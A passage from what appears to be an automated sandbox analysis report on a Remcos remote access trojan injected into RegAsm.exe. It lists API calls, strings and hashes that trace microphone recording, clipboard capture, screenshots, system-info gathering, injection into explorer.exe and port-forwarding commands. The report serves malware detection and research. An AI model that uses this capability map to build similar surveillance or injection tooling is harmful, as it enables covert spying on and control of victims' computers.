                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                                        • _free.LIBCMT ref: 0043A943
                                                                        • _free.LIBCMT ref: 0043A94A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 2441525078-0
                                                                        • Opcode ID: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                        • Opcode Fuzzy Hash: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                        Function 00419FB4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176sleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                        • String ID: @5U$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                        • API String ID: 489098229-4168590520
                                                                        • Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                        • Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                        • GetMessageA.USER32 ref: 0040556F
                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                        • DispatchMessageA.USER32 ref: 00405589
                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                        • API String ID: 2956720200-749203953
                                                                        • Opcode ID: 5ea030363712ba77842d536cdbf33def2348f5e0d7544d4704eea9ef4d92fc10
                                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                        • Opcode Fuzzy Hash: 5ea030363712ba77842d536cdbf33def2348f5e0d7544d4704eea9ef4d92fc10
                                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                        Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                        • API String ID: 1704390241-2575729100
                                                                        • Opcode ID: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                        • Opcode Fuzzy Hash: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                        Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 00416941
                                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                        • GetClipboardData.USER32 ref: 0041696C
                                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                        • String ID: !D@
                                                                        • API String ID: 2172192267-604454484
                                                                        • Opcode ID: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                        • Opcode Fuzzy Hash: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                        Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                        Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00448135
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00448141
                                                                        • _free.LIBCMT ref: 0044814C
                                                                        • _free.LIBCMT ref: 00448157
                                                                        • _free.LIBCMT ref: 00448162
                                                                        • _free.LIBCMT ref: 0044816D
                                                                        • _free.LIBCMT ref: 00448178
                                                                        • _free.LIBCMT ref: 00448183
                                                                        • _free.LIBCMT ref: 0044818E
                                                                        • _free.LIBCMT ref: 0044819C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                        Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 100059EA
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100059F6
                                                                        • _free.LIBCMT ref: 10005A01
                                                                        • _free.LIBCMT ref: 10005A0C
                                                                        • _free.LIBCMT ref: 10005A17
                                                                        • _free.LIBCMT ref: 10005A22
                                                                        • _free.LIBCMT ref: 10005A2D
                                                                        • _free.LIBCMT ref: 10005A38
                                                                        • _free.LIBCMT ref: 10005A43
                                                                        • _free.LIBCMT ref: 10005A51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                        • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                        • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                        • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                        Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Eventinet_ntoa
                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                        • API String ID: 3578746661-3604713145
                                                                        • Opcode ID: 114ca9f643dc2f4d7546a21062c8a27b75c5acd813e7d1c74f06d86295f380ed
                                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                        • Opcode Fuzzy Hash: 114ca9f643dc2f4d7546a21062c8a27b75c5acd813e7d1c74f06d86295f380ed
                                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                        Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DecodePointer
                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                        • API String ID: 3527080286-3064271455
                                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                        Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                        • API String ID: 1462127192-2001430897
                                                                        • Opcode ID: 45d511ba9bf817b3096931c966ebdfdf96c97f09e97a3e6770c335837830b84d
                                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                        • Opcode Fuzzy Hash: 45d511ba9bf817b3096931c966ebdfdf96c97f09e97a3e6770c335837830b84d
                                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                        Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentProcess
                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                        • API String ID: 2050909247-4242073005
                                                                        • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                        • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                        • API String ID: 3809562944-243156785
                                                                        • Opcode ID: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                        • Opcode Fuzzy Hash: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                        Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                        • int.LIBCPMT ref: 00410E81
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 3815856325-2015055088
                                                                        • Opcode ID: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                        • Opcode Fuzzy Hash: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                        • String ID: @5U$dMG$|MG
                                                                        • API String ID: 1356121797-2413048017
                                                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                        • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                        Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                        • DispatchMessageA.USER32 ref: 0041D4F3
                                                                        • GetMessageA.USER32 ref: 0041D500
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                        • String ID: Remcos
                                                                        • API String ID: 1970332568-165870891
                                                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                        Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
